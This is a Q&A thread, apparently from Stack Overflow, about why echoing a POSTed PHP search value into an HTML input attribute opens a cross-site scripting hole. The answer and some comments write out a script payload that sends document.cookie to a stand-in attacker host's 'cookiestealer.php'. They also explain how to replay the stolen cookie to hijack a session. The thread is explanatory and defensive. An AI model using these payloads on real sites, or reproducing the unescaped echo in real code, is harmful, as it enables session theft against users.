# Why printing the posted variable to the html code could lead to XSS?

Tags: php, html, mysql, security, pdo

I have a search form:

```
<form method="POST"> 
    <input type="search" name="q">
    <input type="submit" value="Search" name="search">
</form>
```

Then in PHP file:

```
if( isset($_POST['q']) ){

    //Assigning the posted query to a variable.
    $query = $_POST['q'];

    //Get matches from the DB.
    $stmt = $conn->prepare('SELECT * FROM posts WHERE title OR description LIKE  :s');
    $stmt->bindValue(':s', '%' . $query . '%', PDO::PARAM_STR);
    $stmt->execute();
    $count = $stmt->rowCount();

    //if there are matches.
    if($count > 0){

        //Get the matches.
        $matches = $stmt->fetchAll();
        foreach($posts as $post){
             //Do Something.
        }
    }
}
```

Now everything is fine I think, Why if I do the following:

```
<input type="search" value="<?php if(isset($_POST['q'])){echo $_POST['q'];} ?>" name="q">
```

OR:

```
 <input type="search" value="<?php if(isset($query)){echo $query;} ?>" name="q">
```

That could lead to an attack?

Comment: No, that is perfectly acceptable. All you do is echo a value posted by the visitor. In other words: The visitor gets back what was sent. It never touches your database (in the last two code lines you gave).

Comment: Weird that nobody else reacts. Well, let me say it then: I don't like the PHP inside an attribute value string. Basically you're having a PHP tag inside an input tag. That looks weird. Nor are you escaping the stuff you insert. So you might get corrupted HTML in the end.

Comment: What if the user put this in your last given code's input? :  `"><script>alert('XSS');</script>` Of course it's vulnerable

Comment: @MobinF.R.G, That's exactly similar to what I meant, Someone answered a previous question of mine with the same thing

Comment: @MobinF.R.G, In that case won't that alert be shown for that user only?

Answer (score 0):

An attacker can use XSS to send a malicious script to an unsuspecting user.

For example the attacker can make a Form in his website which is redirected to your address which contains this:

```
<input type="search" value="<?php if(isset($_POST['q'])){echo $_POST['q'];} ?>" name="q">
```

By using this method,the attacker can do some simple but dangerous things.

One of the most dangerous things is ((Copying and using the target user's cookie)).It means that the attacker can type this as a default in his form:

```
"><script>document.location='http://Hacker'sDomain.com/cookiestealer.php?cookie='+document.cookie;</script>
```

As you can see the hacker can easily save the target user's cookie...

Now the hacker has the cookie of user (Suppose the user is logged in).So he can easily put this in his browser's console and login as the target user!!:

```
document.cookie="Stealed Cookie Here!";
```

---

For better understanding you can copy your cookie by executing `document.cookie` in your browser's console and paste it to another  browser or PC by executing this: `document.cookie="Put the copied cookie here"`

Note that the saved cookie of each website and each time you login is different so it's hard and hacker needs a little bit of chance to do this :)

P.S:You can access your browser's console by pressing F12.

---

If you want me to explain more with more codes just say in the comments :)

Comment: So you mean he will send something like 'http://mywebsite.com/q=""><script>document.location='http://Hacker'sDomain.com/cookiestealer.php?cookie='+document.cookie;</script>" ' and when the user goes there the cookies will be stolen

Comment: Can't he run Javascript anyway on my website like `http://mywebsite,com/s=<script>document.location='http://Hacker'sDomain.com/cookiestealer.php?cookie='+document.cookie;</script>` ?

Comment: Where that `s` parameter doesn't exit, Or something like `http://mywebsite.com/<script>Code Here</script>`

Comment: @Dan No that's not possible unless you have that page.In this case (your question) the only way to do an XSS attack is to give a link to the target user and steal his cookies. Like this=> `Link given to user -> User goes to hacker's link -> The hacker's from auto submits and redirects to your website -> The XSS code will be executed -> user will be redirected to hacker's website but this time the hacker steals the cookie and can use the stolen cookie in many ways`

Comment: So I should use `htmlspecialchars();`? or there is a better way?